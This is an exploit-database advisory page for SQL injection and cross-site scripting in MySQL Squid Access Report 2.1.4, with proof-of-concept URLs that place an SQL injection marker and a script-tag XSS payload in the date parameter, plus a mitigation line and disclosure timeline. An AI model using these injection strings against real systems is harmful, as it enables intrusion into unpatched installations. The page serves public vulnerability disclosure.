header-logo
Suggest Exploit
vendor:
MySQL Squid Access Report
by:
Keerati T.
8.8
CVSS
HIGH
SQL Injection and Cross Site Scripting
89, 79
CWE
Product Name: MySQL Squid Access Report
Affected Version From: 2.1.4
Affected Version To: 2.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:mysar:mysar:2.1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities

SQL injection and Cross site script vulnerabilities are found on ALL parameter of MySAR. An example of a SQL injection attack is http://server/mysar/index.php?a=IPSummary&date=[SQLi], and an example of a Cross Site Scripting attack is http://server/mysar/index.php?a=IPSummary&date=2018-04-14"><script>alert(1)</script>

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection and Cross Site Scripting attacks.
Source

Exploit-DB raw data:

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.

2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>

3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.

Navigation

Suggest Exploit

Services By CQR